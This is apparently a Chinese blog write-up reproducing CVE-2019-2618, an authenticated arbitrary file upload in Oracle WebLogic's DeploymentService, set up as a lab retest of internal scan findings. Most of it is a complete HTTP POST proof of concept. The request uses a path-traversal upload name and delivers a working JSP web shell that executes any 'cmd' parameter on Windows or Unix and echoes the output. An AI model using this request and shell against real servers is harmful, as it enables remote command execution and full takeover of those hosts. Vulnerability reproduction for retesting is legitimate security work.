CVE-2019-2618任意文件上传漏洞复现

近期在内网扫描出不少CVE-2019-2618漏洞，需要复测，自己先搭个环境测试，复现下利用过程，该漏洞主要是利用了WebLogic组件中的DeploymentService接口向服务器上传文件。攻击者突破了OAM（Oracle Access Management）认证，设置wl_request_type参数为app_upload，构造文件上传格式的POST请求包，上传jsp木马文件，进而可以获得整个服务器的权限。

靶机：已经安装好的win7 10.3版本weblogic，IP地址：192.168.177.129

启动weblogic：

CVE-2019-2618是任意文件上传漏洞，但是上传利用接口需要账号密码，因为weblogic本身是可以上传war包进行部署网站的，所以漏洞比较鸡肋

漏洞POC:

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 192.168.177.129:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
serverName: weblogic
password:your password
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 1080

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
Content-Type: false

<%@ page import="java.util.*,java.io.*"%>
<% %>

Commands with JSP

  
<%  
if (request.getParameter("cmd") != null) {  
    out.println("Command: " + request.getParameter("cmd") + "
");  
    Process p;  
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){  
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));  
    }  
    else{  
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));  
    }  
    OutputStream os = p.getOutputStream();  
    InputStream in = p.getInputStream();  
    DataInputStream dis = new DataInputStream(in);  
    String disr = dis.readLine();  
    while ( disr != null ) {  
    out.println(disr);  
    disr = dis.readLine();  
    }  
}  
%>

------WebKitFormBoundary7MA4YWxkTrZu0gW--